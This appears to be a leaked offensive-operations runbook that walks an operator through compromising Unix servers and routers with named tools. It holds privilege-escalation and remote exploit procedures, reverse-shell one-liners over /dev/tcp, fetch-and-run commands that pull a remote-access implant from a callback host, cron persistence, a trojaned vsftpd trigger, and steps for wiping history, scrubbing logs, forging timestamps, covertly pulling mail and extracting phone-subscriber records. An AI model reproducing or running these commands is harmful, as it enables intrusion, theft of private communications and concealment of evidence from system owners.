:%s/DISPLAY_PORT/RANDOM2/g
:%s/TTSESSIONPROGNUM/TTSESSIONPROGNUM/g
:%s/TTSESSIONPROGPORT/TTSESSIONPROGPORT/g
`x
### Get your netcat ready
packrat NETCAT_PORT
### redirector
-tunnel
l RANDOM_PORT TARGET_IP TTSESSIONPROGPORT
r DISPLAY_PORT 127.0.0.1 6000
r NETCAT_PORT
### use info from highest ttsession portinfo:
# Usage:
#./rpcttjamsession [-p port] [-r rpc_program] [-v rpc_version][-d display_ip] [-
n display_port] [-c cookie_string] [-7] [-t] hostname
# -d display_ip - IP address to set DISPLAY
# -n display_port - redirection port for Xwindows, default is 6000.
# -t - test the RPC call, do not send message.
# -7 is for Solaris 7 default rpc program number
# -c - User's Cookie as a character string.
# (-v = rpcversion from scan results)
### REDIRECTED:
# Ex. - ./rpcttjamsession -d 203.555.28.242 -v 4 -n 22222 -p 32782 -r 134217727
9 127.0.0.1
./rpcttjamsession -d PITCH_IP -v RPCVERSION -n DISPLAY_PORT -p RANDOM_PORT -r TT
SESSIONPROGRAMNUMBER 127.0.0.1
### NO REDIRECTOR:
./rpcttjamsession -d LOCAL_IP -v RPCVERSION -n 6000 -p TTSESSIONPROGPORT -r TTSE
SSIONPROGRAMNUMBER TARGET_IP
### Be patient. Check your tunnels and watch for activity in your tcpdump.
### If all goes well, a target window will pop up in the left corner of your screen.
### Paste commands in it and GET THE MOUSE OUT OF THE BOX (mouse movement generates more X traffic)
### In remaining local windows, connect to PI host, then connect to TARGET: ####
######
-rm sendmail
### to PI host:
cd /current/down
../bin/noclient PITCH_IP:NETCAT_PORT
### from PI host to TARGET:
#-nstun TARGET_IP RAT_PORT
#-readrc ../etc/norc.osf1
-nstun TARGET_IP RAT_PORT
#########################################################
# ENERGIZERBUNNY
#########################################################
# elevate to root: Sol 2.3-2.9
-put /current/up/eb eb
-put /current/up/mod32 mod32
# or -put /current/up/mod64 mod64
./eb -h
./eb [-k 32|64] [-p <pid>] [-u <uid>] [-g <gid>] [-n]
./eb
id
### start a new nopen as root:
PATH=. D="-l RANDOM" sendmail
-nstun TARGET_IP RANDOM
-rm eb mod32
#########################################################
# WALNUTSMOOTHY
#########################################################
# elevate to root: Sol 2.5.1-2.8
mkdir /tmp/1291aaab/
-put /current/up/efs f
cp f /tmp/1291aaab
-shell
cd /tmp/1291aaab
pwd
./f
unset HISTSIZE
unset HISTFILESIZE
unset HISTFILE
id
cd /tmp/.scsi
head /etc/passwd
### start a new nopen as root while in -shell:
PATH=. D="-l RANDOM" sendmail
exit
### connect to privileged nopen:
-nstun TARGET_IP RANDOM
### burn unprivileged nopen
### cleanup files
-rm /tmp/1291aaab/f f sendmail
-rm /tmp/1291aaab
-lt /tmp
#########################################################
# EXTREMEPARR
#########################################################
# elevate to root: Sol 2.6-2.9
###
### make sure this exists:
-ls /usr/dt/bin/dtappgather
### Upload the proper version
-cd /tmp/.scsi
-put /current/up/exp.x.tar.Z b.tar.Z
uncompress b.tar.Z
tar -xf b.tar
### Find a setuid root program to use for the exploit
### The following should work:
### w, ps -ef, at -l, whodo, who, and ls -al
### Pick a program, determine the location, and verify setuid root is there
### (should see perms of -rwsr-xr-x)
which at
-ls /bin/at
### Verify su is NOT in the locale directory already
ls -al /usr/lib/locale/su
### Rename the shared object to have the name 'su', or whichever locale name you use instead
### Be sure you use the correct version for the system's architecture
cp su.so.2.789x su.so.2
-ls -t
### Have a copy of nopen in your working directory to start up once you get root:
-put /current/up/noserver sendmail
-ls
### Insert the local shared object into /usr/lib/locale by running the following.
### This will also generate itime commands to use later when cleaning up,
### the normal error messages, and an indication of the success/failure of the
### insertion of the object into /usr/lib/locale
./exp su
echo "" | at now + 180 mins
### Set up your variables
-getenv
-setenv LC_TIME=su
-getenv
at -l
-shell
LC_TIME=su
export LC_TIME
at -l
id
pwd
cd /tmp/.scsi
PATH=. sendmail
exit
exit
### Connect from pitch to new noserver that has root privileges
-nstun TARGET_IP
### Burn your unprivileged nopen session and connect agin to new noserver
-burn
-nstun TARGET_IP
### Cleanup
at -l
at -r 1085530072.a
at -l
ls -al /.sh_history
-ls -t /
ls -lart /usr/lib/locale
rm /usr/lib/locale/su/*
rmdir /usr/lib/locale/su
-lt /usr/lib/locale
ls -al /usr/lib | grep locale
ls -al /var/dt/appconfig | grep appmanager
ls -al /var/dt | grep appconfig
chmod 755 /usr/lib/locale
chmod 755 /var/dt/appconfig/appmanager
chmod 755 /var/dt/appconfig
chown bin:bin /usr/lib/locale
chown root:root /var/dt/appconfig/appmanager /var/dt/appconfig
ls -al /usr/lib | grep locale
ls -al /var/dt/appconfig | grep appmanager
ls -al /var/dt | grep appconfig
-touch /usr/lib/localedef /usr/lib/locale
-w
-ls -t
id
-w
-ls
-ls -t /usr/lib/locale
-ls -t /usr/lib/locale/iso_8859_1
-ls -t /usr/lib/locale/iso_8859_1/LC_CTYPE
-touch /usr/lib/locale/iso_8859_1 /usr/lib/locale/.
touch -r /usr/lib/locale/iso_8859_1 /usr/lib/locale/.
-ls -t /usr/lib/locale
ls -al /var/dt/appconfig | grep appmanager
ls -al /var/dt | grep appconfig
-ls -t /var/dt/
-ls -t /var/dt/appconfig
touch -r /var/dt/. /var/dt/appconfig/appmanager
touch -r /var/dt/. /var/dt/appconfig/.
-ls -t /var/dt/appconfig
-ls -t /var/dt/
### Clean up directory
-ls -t
-rm sendmail empty su.so.2 b.tar exp su.so.2.789x su.so.2.6x
-ls -t
### Check crontabs and logs if you used 'at'
-ls -t /var/adm
-ls -t /var/spool/cron
-ls -t /var/spool/cron/atjobs
touch -r /var/spool/cron/crontabs /var/spool/cron/atjobs
-tail -40 /var/cron/log
### Toast and sgrep your initial exploit
#######################################
### EVENTSTART
#######################################
### might reboot box on first try; after the reboot, it should work
### if you exploited an http service (like w/ EMBERSNOUT) make sure that
### service is started upon reboot; RH9.0 doesn't restart http by default
### unless the admin changed the config
### start a cron job to call nopen in case of a reboot (if you won't be able to
reexploit)
### set the time to remove itself to the next hour (use both local and UTC time)
vi /current/down/crontab:
0,5,10,15,20,25,30,35,40,45,50,55 * * * * sh -c "D=-cPITCH_IP:PORT /tmp/.httpd-l
ock/crond"
0 1,17 * * * crontab -r
### on target:
date; date -u
-ls -t /var/log/cron
-ls -t /var/spool/cron
-cat /etc/syslog.conf
crontab -l
-put /current/down/crontab crontab
-cat crontab
crontab crontab
crontab -l
date
########################################
# TFTPD - upload image to router
########################################
########################################
# SAMPLEMAN / ROUTER TOUCH
########################################
### redir
-tunnel
l 2323 TARGET_IP 23
### Locally:
telnet 127.0.0.1 2323
# userid = <>
# passwd = <>
term length 0
sh user
sh ver
sh arp
sh ip rout
sh proc cpu
enable
# enable password = <>
sh run
sh start
sh cdp neighbo detail
sh flash all
# use the chart to figure out mem location for the next command if applicable
sh mem <address>
logout
########################################
# ENGAGENAUGHTY
########################################
# Apache and SSL exploit on Linux on Dec ALpha
# ssl must be OpenSSL 0.9.6d or earlier
Usage: ./apache-ssl-linux-alpha <-i hostname> [-t arch] [-p port] [-n <connectio
ns>] [-a 0x<address>]
-t <arch> target architecture (default is 00)
-p <port> SSL port (default is 443)
-a 0x<address> the free location found via objdump
-n <N> open N apache connections before sending the shellcode (def
ault is 20)
-m <N> maximum number of open connections (default is 50)
-v verbose mode
-c command to run (default is "ls > /tmp/ls".)Supported archit
ectures:
target archs:
00 - RedHat Linux 7.0 Apache/1.3.12 (Unix) (Red Hat/Linux) mod_ssl/2.6.6 OpenSS
L/0.9.5a
Examples: ./apache-ssl-linux-alpha -a 10 -v localhost
./apache-ssl-linux-alpha -p 1234 192.168.0.1 -n 40 -m 80
examples of commands:
1. xterm: /usr/X11R6/bin/xterm -display 555.1.2.153:0 -e /bin/sh
2. wget: First: echo -e "HTTP/1.0 200\n" > new; cat new noserver-2.6.1-i586.pc.
linux.gnu.redhat-5.0 > sendmail; nc -v -l -p 53 < sendmail
then: cd /tmp;wget http://555.1.2.153:53/sendmail; chmod +x /tmp/sendmail;PA
TH=/tmp sendmail;rm -f sendmail
3. xinetd (watch for logging): echo -e "service squid\n{\nsocket_type = stream\n
wait = no\nuser = apache\nserver = /bin/sh\n}" > /tmp/.scsi; /usr/sbin/xinetd -f
/tmp/.scsi
############################################################################
# EXPLOITRETURN
# redflag 2.0 and redhat 9.0 running PHP
# found in cgi-bin for sybil build
-scan http TARGET_IP
HTTP/1.1 200 OK
Date: Wed, 25 Feb 2004 22:02:11 GMT
Server: Apache/1.3.12 (Unix) (Black Cat/Linux) mod_ssl/2.6.4 OpenSSL/0.9.5a PHP
/4.0.0 rus/PL29.4
-tunnel
l 80 TARGET_IP
# choose 79, 5555
r 79
or
r 5555
telnet 127.0.0.1 80
GET /HTTP/1.0
telnet 127.0.0.1 80
GET /ppd/product_user/reg_edu.php HTTP/1.0
# hit return twice
#response looking for: HTTP/1.1 302 Found
# do not use option 1 or 4 since it brings inconsistent results
xp_server
# uuencoded rat
uuencode sendmail sendmail > sendmail.uu
nc -l -v -p 79 < sendmail.uu
./xp_serial -i127.0.0.1 -p80 -d"/ppd/product_user/reg_edu.php" -l PITCH_IP -n79
-t3
or
# no uuencode of rat
nc -l -v -p 5555 < sendmail
./xp_serial -i127.0.0.1 -p80 -d"/ppd/product_user/reg_edu.php" -l PITCH_IP -n555
5 -t2
# after rat upload, <ctrl><c> nc command
-nstun TARGET_IP
# will be nobody - need to elevate with ptrace or other
# need to clean the following logs
/var/log/httpd/error_log
/var/log/httpd/access_log
#####################################################
# EGGBASKET
#####################################################
# Remote exploit against the Netscape Web Server which leverages
# a buffer overflow to obtain remote access
# Netscape Enterprise/3.6 and Netscape Enterprise/3.6 SP1
# works against AIMC Netscape servers also with right versions
# Netscape-Enterprise 3.6:
# solaris 2.6(sun4m only), sun4u & sun4m solaris 2.7 - 2.9
# Netscape-Enterprise/3.6 SP1:
# sun4m solaris 2.8, sun4m & sun4u solaris 2.9
# need local to elevate such as SMOOTHY and EXTREMEPARR
# Verify version of Netscape if target did not change version string
-scan http TARGET_IP
# from redirector
-tunnel
l 80 TARGET_IP
# locally
nc 127.0.0.1 80
GET / HTTP/1.0
<return>
<return>
# on redirector
-tunnel
l 80 TARGET_IP
r RANDOM_HIGH_PORT1
# locally window1
nc -vv -l -p RANDOM_HIGH_PORT1
# Usage: xp_ns-httpd
# i7 - program counter, location we are jumping to; fp - stack location; 04 -
where our code is
Targets: <version> <architecture> i7
fp o4
Version: 01: Netscape-Enterprise/3.6/sun4u/5.8/fire115/aimc 0xff2a2a74 0xff
2e6270 0x13ab60
Version: 02: Netscape-Enterprise/3.6/sun4m/5.8/theora/aimc 0xef722a74 0xef
766270 0x13a360
Version: 03: Netscape-Enterprise/3.6/sun4m/5.8/unixtest-4/aimc 0xef6e2a74 0xef
726270 0x13a060
Version: 04: Netscape-Enterprise/3.6/sun4u/5.8/unixtest-1/aimc 0xff2a2a74 0xff
2e6270 0x13a160
Version: 05: Netscape-Enterprise/3.6/sun4u/5.8/fire121/aimc 0xff2a2a74 0xff
2e6270 0x13ab60
Version: 06: Netscape-Enterprise/3.6/sun4m/5.8/arc/aimc 0xef6e2a74 0xef
726270 0x139d60
Version: 07: Netscape-Enterprise/3.6/sun4u/5.7/baltimore/aimc 0xff2a2a74 0xff
2e6270 0x13a360
Version: 08: Netscape-Enterprise/3.6/sun4u/5.7/grandmama/aimc 0xff2a2a74 0xff
2e6270 0x13a260
Version: 09: Netscape-Enterprise/3.6/sun4m/5.7/unixtest-3/aimc 0xef722a74 0xef
766270 0x139360
Version: 10: Netscape-Enterprise/3.6/sun4m/5.6/elsa/aimc 0xef722a74 0xef
766270 0x13a060
Version: 11: Netscape-Enterprise/3.6/sun4m/5.6/gazoo/aimc 0xef722a74 0xef
766270 0x13a060
Version: 12: Netscape-Enterprise/3.6/sun4m/5.6/loneranger/aimc 0xef722a74 0xef
766270 0x139360
Version: 13: Netscape-Enterprise/3.6/sun4u/5.9/fire108/aimc 0xff2a2a74 0xff
2e6270 0x139f60
Version: 14: Netscape-Enterprise/3.6/sun4m/5.9/mack/aimc 0xef6e2a74 0xef
726270 0x139d60
Version: 15: Netscape-Enterprise/3.6/sun4u/5.9/thing/aimc 0xff2a2a74 0xff
2e6270 0x139f60
Version: 16: Netscape-Enterprise/3.6/sun4u/5.9/thing 0xff2a2a74 0xff
2e6270 0x155090
Version: 17: Netscape-Enterprise/3.6/sun4u/5.9/fire117 0xff2a2a74 0xff
2e6270 0x155090
Version: 18: Netscape-Enterprise/3.6/sun4m/5.6/loneranger 0xef722a74 0xef
766270 0x153f78
Version: 19: Netscape-Enterprise/3.6/sun4u/5.9/thing 0xff2a2a74 0xff
2e6270 0x155290
Version: 19: Netscape-Enterprise/3.6/sun4u/5.8/blade1000 0xff2a2a74 0xff
2e6270 0x155f90
Version: 20: Netscape-Enterprise/3.6sp1/sun4u/5.9/thing 0xff2a2c64 0xff
2e6750 0x155390
Version: 21: Netscape-Enterprise/3.6sp1/sun4m/5.8/theora 0xef722c64 0xef
766750 0x155390
Version: 22: Netscape-Enterprise/3.6sp1/sun4m/5.9/mack 0xef6e2c64 0xef
726750 0x155090
########################################
# Exploits a vulnerability in the Postfix mail server.
# Postfix runs on FreeBSD, Linux, Solaris, and most Unix servers.
# This exploit works for the default binary packages in SuSE 9.0-9.2, ASP Linux
9, and Debian 3.1
# must elevate to get root
# postfix 2.0.14-41 on SuSE 9.0
# postfix 2.0.19_20040312-11 on SuSE 9.1
# postfix-2.0.8-1asp on ASP Linux 9
# postfix-2.1.5 on SuSE 9.2
# postfix-2.1.5 on Debian 3.1
#
# ENTERSEED expects the DUL Encoder to be in its current directory, as well
# as write permission to that directory.
#
# In the event of a chroot'ed environment, shared libraries will not be us
uable.
# Any uploaded files (such as noserver) must be statically compiled.
#
# -tunnel
# r NETCAT_PORT
# l RANDOM TARGET_IP TARGET_PORT
#####################################################
# EMPTYBOWL
#####################################################
# vulnerability in MailCenter Gateway (mcgate) - an application that comes
# with Asia Info Message Center mailserver; buffer overflow allows a string
# passed to popen() call to be controlled by an attacker; arbitraty cmd execute
# known to work only for AIMC Version 2.9.5.1
# may get one shot only and then server will crash
# works on solaris 2.6-2.10
# test - fire115
# make sure not windows target running 3389 but unix target
-scan mail TARGET_IP
-scan 3389 TARGET_IP
# Usage: ./emptybowl.py <target-ip> <port> <cmd-string>
# --NOTE: All spaces in cmd-string will be replaced by \t's
# on redirector
-tunnel
l 3389 TARGET_ip
r LOW_PORT_1
r LOW_PORT_2
# local may be needed to elevate privileges
# DO NOT use the command below, since only have 1 shot at target
#./emptybowl.py 127.0.0.1 3389 'mkdir /tmp/.scsi ; cd /tmp/.scsi && telnet PITCH
_IP NETCAT_PORT < /dev/console | uudecode && uncompress sendmail.Z && chmod 700
sendmail && PATH=. D="-cPITCH_IP:NOPEN_PORT" sendmail;'
(sh</dev/tcp/PITCH_IP/RANDOM_HIGH_PORT1>&0 2>&0)
##### use this one
nc -l -vv -p 33333
./emptybowl.py 555.1.9.115 3389 "/usr/bin/ksh -c \"sh</dev/tcp/555.1.14.111/3333
3 >&0 2>&0\""
##### or this with doublet:
./emptybowl.py 555.1.9.115 3389 "/usr/bin/ksh -c \"cat < /dev/tcp/555.1.14.111/3
3333 | /bin/sh 2>&1 | cat > /dev/tcp/555.1.14.111/44444 2>& 1\""
# on redirector
netstat -an | grep LISTEN
# look for low ports to use for doublet that are not
# being used on the redirector (21,22,22,53,79,80,443...)
# substitute LOW_PORT_1, LOW_PORT_2 with ports decided
# from the above netstat command
doublet -O LOW_PORT_1 LOW_PORT_2
# change LOW_PORT_1, LOW_PORT_2, and PITCH_IP
./emptybowl.py 127.0.0.1 3389 "/bin/ksh -c \"cat < /dev/tcp/PITCH_IP/LOW_PORT_1
| /bin/sh 2>&1 | cat > /dev/tcp/PITCH_IP/LOW_PORT_2 2>& 1\""
#./emptybowl.py 127.0.0.1 3389 '(telnet PITCH_IP LOW_PORT_1 ; sleep 1) | /bin/sh
| telnet PITCH_IP LOW_PORT_2'
# in doublet window
unset HISTSIZE
unset HISTFILESIZE
unset HISTFILE
w
pwd
id
cd /tmp
mkdir .scsi
cd .scsi
# locally
packrat RAND_PORT
<ctrl><c> # packrat command
gedit sendmail.Z.uu
# in doublet
pwd # make sure in /tmp/.scsi
/usr/bin/uudecode; ls -latr
copy/paste gedit contents into this window
uncompress sendmail.Z
ls -l
chmod 700 sendmail
PATH=. sendmail
# from redirector
-nstun TARGET_IP
# restart mcgate
<ctrl><d> doublet window on TARGET_IP
<ctrl><d>
# close tunnels on PITCH_IP
# start a new NOPEN with 'at' to avoid inheritance of listening socket
-cd /tmp/.scsi
echo "./sendmail" | at now
# from PITCH_IP
-nstun TARGET_IP:32755
#burn this NOPEN to free up socket; from original NOPEN
# started (32754) on TARGET_IP
-burnBURN
# NOPEN 2:
# now restart mcgate in new NOPEN - use at again to prevent mcgate
# from being terminated on exit.
-cd /opt/aimc/setup
echo "./mcgate" | at now
-cd /tmp/.scsi
ps -ef | grep mcgate
# ELEVATE with extremeparr (dtappgather)
# after ELEVATE with extremeparr (dtappgather)
# and restarting noserver (sendmail), connect with
-nstun TARGET_IP:32754
-rm sendmail
# burn nopen window on TARGET_IP with id of aimc
id
-burnBURN
#
# cleanup
-lt /opt/aimc/setup/
# remove core file
-rm /opt/aimc/setup/core
# in mcgate's directory; the following will be appended to mcgate.<date>:
Fri Feb 11 16:36:49 2005: cmdopen
--- : 0 : current cmd: uapi -u -f userPassword -e **************************
******************
Fri Feb 11 16:36:49 2005: cmdopen
--- : 0 : Result: rc= -5 len=0
-get /opt/aimc/setup/mcgate.YYYYMMDD
#locally
cp /current/down/../HOSTNAME.IP/opt/aimc/setup/mcgate.YYYYMMDD /current/up/m
# remove above entries; please leave the mcgate
# start values even the one we started. For example, leave:
Fri Apr 8 16:12:28 2005: main
--- : 0 : Current server port is 3389
vi /current/up/m
# on target
-put /current/up/m m
-ls -n /opt/aimc/setup/mcgate.YYYYMMDD
cat m > /opt/aimc/setup/mcgate.YYYYMMDD
-tail /opt/aimc/setup/mcgate.YYYYMMDD
# use -touch -t command from -ls -n output to
# reset timestamp on /opt/aimc/setup/mcgate.YYYYMMDD and
# /opt/aimc/setup. For example:
-touch -t 1112992709:1112992787 /opt/aimc/setup/mcgate.YYYYMMDD
-touch -t 1112992709:1112992787 /opt/aimc/setup
-rm m
at -l
-lt /var/spool/cron /var/spool/cron/atjobs
-touch /var/spool/cron/crontabs /var/spool/cron/atjobs
-cd ..
-rm .scsi
###### PORKED VSFTP Server #################################
# check to see if can use DIZZYTACHOMETER to remove mismatched vsftpd
rpm --version
whereis vsftpd
rpm -qf /usr/sbin/vsftpd
rpm -V vsftpd-1.1.3-8
-lt /usr/lib/librpm-4.1.so /usr/lib/librpmdb-4.1.so /usr/lib/librpmio-4.1.so /us
r/lib/libpopt.so /usr/lib/libbeecrypt.so /usr/lib/libbz
2.so
# or
-lt /usr/lib/librpm-4.2.so /usr/lib/librpmdb-4.2.so /usr/lib/librpmio-4.2.so /us
r/lib/libpopt.so /usr/lib/libbeecrypt.so /usr/lib/libbz
2.so
-lt /usr/sbin/vsftpd
# normal vsftpd md5sum: 11111ecd2d3ab44015eae3592fcfaec7
# porked vsftpd md5sum: bde8b06829df05be8be4b5972a2d4a39
md5sum vsftpd
-put /current/up/it it
./it /usr/sbin/vsftpd
cp /usr/sbin/vsftpd ?
-put /current/up/vsftpd vsftpd
cp vsftpd /usr/sbin/vsftpd
# use itime results to reset vsftpd times to original settings
./it /usr/sbin/vsftpd
service vsftpd stop
service vsftpd start
######## Trigger porked vsftpd
### in local window, get nopen ready
packrat -z NETCAT_PORT
### on redirector, get nopen listener ready
-nrtun NOPEN_PORT
### on redirector, set up tunnel, use a "pork source port" from list below
-tunnel
l 21 TARGET_IP 21 SPORT
r NETCAT_PORT
### in scripted local window, send pork trigger
#Usage: ./client -t|-u timeadj sport hostname dport command
#sport: 3 51 3854 5671 8213 12634 16798 23247 35139 47923 53246 63201
#./client -t|-u [tcp/udp] timeadj sport [(valid source ports for the server are:
3, 51, 3854, 5671, 8213, 12634, 16798, 23247, 35139, 47923, 53246, 63201)] hos
tname[Host IP] dport [(port on which PORKified daemon is listening)] command"
./client -t 0 SPORT 127.0.0.1 21 "cd /tmp;mkdir -p .scsi && cd .scsi; cat < /dev
/tcp/PITCH_IP/NETCAT_PORT > sendmail.uu && uudecode sendmail.uu && chmod 755 sen
dmail && PATH=. S=1 D=\"-cPITCH_IP:NOPEN_PORT\" ./sendmail"
# 2 step troubleshooting
-tunnel
l 80 TARGET_IP
r NETCAT_PORT
nc 127.0.0.1 80
telnet 127.0.0.1 80
GET /phpBB2/ HTTP/1.0
# response should be:
# Powered by phpBB 2.0.4
# determine if viewtopic.php is vulnerable
./xp_phpbb.pl -i http://127.0.0.1:80/forum/ -t1 -c"uname -a;ls -la;w"
# response should have the output of the commands in the request:
# ...
# <br/>
cd /current/up
#locally to setup fowget to put rat on target since no uudecode
echo -e "HTTP/1.0 200\n" > new
cat new noserver > sendmail
nc -v -l -p NETCAT_PORT < sendmail
# on PITCH
-nrtun RAND_PORT
# upload and execute nopen
./xp_phpbb.pl -i http://127.0.0.1:80/forum/ -t1 -c"(mkdir /tmp/.scsi; cd /tmp/.s
csi; /usr/bin/wget http://PITCH_IP:NETCAT_PORT/sendmail
-Osendmail;chmod +x sendmail;D=-cPITCH_IP:RAND_PORT PATH=. sendmail) 2>/dev/nul
l"
# clean web access log
######### SNMPWALK
-tunnel
u 161 TARGET_IP
snmpwalk 127.0.0.1 -c COMMUNITY_STRING .system
#snmpwalk -v1 -c Ult1mate 127.0.0.1 .system
#snmpwalk -v2c -c Ult1mate 127.0.0.1 .system
#snmpwalk -v1 -c tenkap 127.0.0.1 enterprises.9.9.23.1
# Software info....
snmpwalk 555.1.2.240 -c COMMUNITY_STRING jetson .system
# Hardware info .....
snmpwalk 555.1.2.240 -c COMMUNITY_STRING jetson 47.1.1.1.1.2
# CDP neighbors
snmpwalk 555.1.2.240 -c COMMUNITY_STRING jetson enterprises.9.9.23.1
# Flash Stuff
snmpwalk 555.1.2.240 -c COMMUNITY_STRING jetson 16
snmpwalk 555.1.2.240 -c COMMUNITY_STRING jetson enterprises.9.2.10.17.1.1
# Arp Cache
snmpwalk 555.1.2.240 -c COMMUNITY_STRING jetson
ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaPhysAddress
# Route info
# not sure on this one what you want....
# gives 1500 lines on our jetson.net switches
snmpwalk 555.1.2.240 -c COMMUNITY_STRING jetson ip.ipRouteTable |wc
#####################################################
# EVOKEPROMPT
#####################################################
# In netscape/mozilla to get magic cookie:
# Tools->Cookie Manager->Manage Stored Cookies
# click on your cookie; take note of name and Information
# change name-sessionid and OWVSdif1.AMY to name and Information
# for the following command
# change callback IP
in /etc/hosts, add the dns target name to 127.0.0.1
### try connecting via netcat after any "session failed" message when redirectin
g:
unset HISTSIZE
unset HISTFILESIZE
unset HISTFILE
w
uname -a
### start a netcat with the right nopen version (don't need to uuencode with /de
v/tcp way)
### nc -l -p NETCAT_PORT < sendmail
pwd
mkdir /tmp/.scsi; cd /tmp/.scsi; pwd
ls -l /usr/bin/uudecode
/bin/cat</dev/tcp/203.234.72.4/39588>/tmp/.scsi/sendmail
chmod 700 sendmail
PATH=. sendmail
id
#####################################################
# POPPING MAIL FROM A TARGET
#####################################################
### You'll be listing the messages from within a scripted window
### You'll need to devise a way to separate the mail for multiple users (for tuc
kering)
### if you are accessing more than one account
### You might try using a separate scripted window for each user, then copyi
ng
### the scripted window to the name of the user for post-processing
### The session timeout is fairly short so have your commands ready to paste
### You have to "guess" where the newest mail is, so you might want to start
### backwards to get the most recent mail, IF that applies and the mail is
### sorted by date
### IMPORTANT!!!!!! DO NOT "QUIT" THE SESSION!!!! LET IT TIMEOUT,
### OR CLOSE THE TUNNEL TO HAVE IT DROP THE CONNECTION.
### You do not want the mail marked as "read" or anything else.
### set up tunnels on redirector:
-tunnel
l 110 TARGET_IP
#############################################################################
############ I AM ROOT!
#############################################################################
###path with NO Working directory for atjob
#-setenv PATH=:/usr/bsd:/bin:/usr/bin:/sbin:/usr/sbin:/etc:/usr/etc
-setenv PATH=/usr/bin:/bin:/usr/sbin:/sbin:/usr/local/bin
HISTFILE="" ksh
# or
unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
-ls
-rm sendmail sendmail.uu
# Look for and clean (if necessary) logs
###### FORENSICS ##############
=info
df -k
-find <directory1> <directory2>
-gs survey
-ls /var/spool/cron/crontab
-strings /platform
## /platform/SUNW,SystemEngine
### See who's on, note uptime and load; verify time/timezone; see who's been on
w; date; last -80
### Change owner/group/modes...if in doubt, see what's already in "/tmp"...
-ls -t / /tmp
### core files?
-ls /core
### Root users:
-ls /var/adm/sulog
-vget /var/adm/sulog
### owner:group should be root:sys...
chown -R root:sys /tmp/.scsi; chmod -R og-rwx /tmp/.scsi; ls -al
### Baseline swap
/sbin/ps -elf; swap -l; uptime
### Enough space to upload tools? Any partitions about to fill up?
df -k
#################################
### SGREP messages
#################################
-put ../up/sgrep s
-tail /var/adm/messages
### To look first:
./s "unique string" /var/adm/messages
### To replace with a string of equal or shorter length
./s "unique string" "replacement string" /var/adm/messages
#################################
### SGREPSUB (numerous things to grep)
#################################
### Locally, create a file containing the lines you want to change from /var/adm
/messages
cd /current/down
vi sg.input
### Locally, create a 2nd file containing one or more lines of replacement strin
gs
cd /current/down
vi sg.repl
### Locally, run
sgrepsub -i sg.input -r sg.repl -c <COL_NUM> -f /var/adm/messages -s ./s
### Verify the output, then paste the generated commands in the target window
#################################
### PCLEAN (put up right one)
#################################
-put ../up/pcleanTAB sendmail
-ls
### make sure to exit all but one window (processes log upon completion)
### DO NOT RUN ANY MORE NON-BUILTIN COMMANDS or you'll HAVE TO PCLEAN AGAIN!!!!
################################################################################
######
# yyserv commands
# info - stats on collected sessions
info
# filt - reprogramming the filter rules it is running; intended to only be
# used with commands generated by genconf
filter
# copy filters one by one based on local genconf output
# file - writes out collected data to disk; file name in double quotes
# ex: "/tmp/filename"; should receive ERROR if wrong, WROTE to "/tmp/filename"
file "/tmp/.scsi/d
# in nopen window not running yyserv
-get /tmp/.scsi/d
-rm /tmp/.scsi/d
# locally
/current/etc/suctionchar.decrypt PATH/d outfile
# free - deallocates memory to store collected data; should always get OK
free
# hook - realtime snooping of existing processes
# ex: hook PID
# unho - unhooking any realtime hooked processes
# sets - set maximum bytes collected per session (MAX S =)
# setc - set maximum total bytes, across all collected sessions, used to
# store data in memory (MAX C =)
# unpa - unpatch itself from the kernel
# exit - send kill to yyserv
# when finished using yyserv manually, make sure cleaned up properly
ps -ef | grep yyserv
-lt
-rm yyserv
-cd /tmp
-rm /tmp/.scsi
######################################################
# STRIFEWORLD
######################################################
###
### IMPORTANT: make note of PID,PPID that strifeworld reports when you start it
and save it in opnotes
###
### man page:
cd /current/etc
nroff -man strifeworld.1
### make note of PID,PPID it echos back and document the command used to start
it
-lcd /current/down/mailpull/TARGET_NAME.TARGET_IP
##### or use -chili
#
-chili -s 1 -l mm-dd-yyyy /var/mail USER1
## after down, check size locally
cd /current/down/mailpull/TARGET_NAME.TARGET_IP
# look at SA mail
-tail /var/adm/sulog
-ls /var/mail/USER
grep -n -i "^Subject: " /var/mail/USER
####
## Kill off all remote nopen server processes...
####
-burn
BURN
#### Try reconnecting to make sure noserver died
###
### END File user.tool.pork.COMMON
### (see also ../etc/user.tool.pork.COMMON)
###
### BEGIN File user.tool.cursehydrant.COMMON (see also ../etc/user.tool.curseh
ydrant.COMMON)
###
################ CURSEHYDRANT #########################
############### PARSING #######################################################
############
### vi Search/Replace commands ###
### ProjectName - self explanatory
### Date field - today's date, used for output files
### Host - hostname of the box (not IP address)
### Cryptkey - encryption key (use output from below md5sum command)
md5sum /current/down/tcpdump.raw
mx
:%s/PROJECTNAME/PROJECTNAME/g
:%s/DDMonYY/DDMonYY/g
:%s/HOST/HOST/g
:%s/CRYPTKEY/CRYPTKEY/g
'x
### Save the encryption key locally:
echo CRYPTKEY > /current/down/cryptkey.cursehydrant.DDMonYY
####### Prepare files containing numbers to search for:
# if files containing the numbers to search available:
mkdir /current/down/argfiles
cd /current/down/argfiles
mz
cp /mnt/zip*/arg* /current/down/argfiles
#or
cp /mnt/zip*/PROJECTNAME/arg* /current/down/argfiles
ls -altr
######
###### survey mode:
######
### checks for IMEIs that have more than one IMSI associated with it:
### to limit amount of memory used, replace "-x" with "-X numberBytes"
export ENV_ARGS='-x -k CRYPTKEY -z "ls -1rt /share/a1338/ne_q3ic/nb/convert/outp
ut/06051[1-2]*dF*"'; ./lvmkd >T:/current/down/cdrhits.cursehydrant.HOST.DDMonYY.
enc.surveyIMEI
### generates a list of Cell IDs associated with each MSC address:
### to limit amount of memory used, replace "-y" with "-Y numberBytes"
export ENV_ARGS='-y -k CRYPTKEY -z "ls -1rt /share/a1338/ne_q3ic/nb/convert/outp
ut/06051[1-2]*dF*"'; ./lvmkd >T:/current/down/cdrhits.cursehydrant.HOST.DDMonYY.
enc.surveyMSC
######
##### when it's done running, decrypt the file (-d -c options)
######
cd /current/down
ls -latr cdr*enc*
# to decrypt individually:
cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.cursehydrant.HOST.DDMonYY.enc1
-o cdrhits.cursehydrant.HOST.DDMonYY.txt1 -k CRYPTKEY -d -c
cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.cursehydrant.HOST.DDMonYY.enc2
-o cdrhits.cursehydrant.HOST.DDMonYY.txt2 -k CRYPTKEY -d -c
#####
##### clean up
#####
####### HP-UX (DO NOT BURN! DO NOT BURN! DO NOT BURN!)
-gs wearcup
####### Everything else...
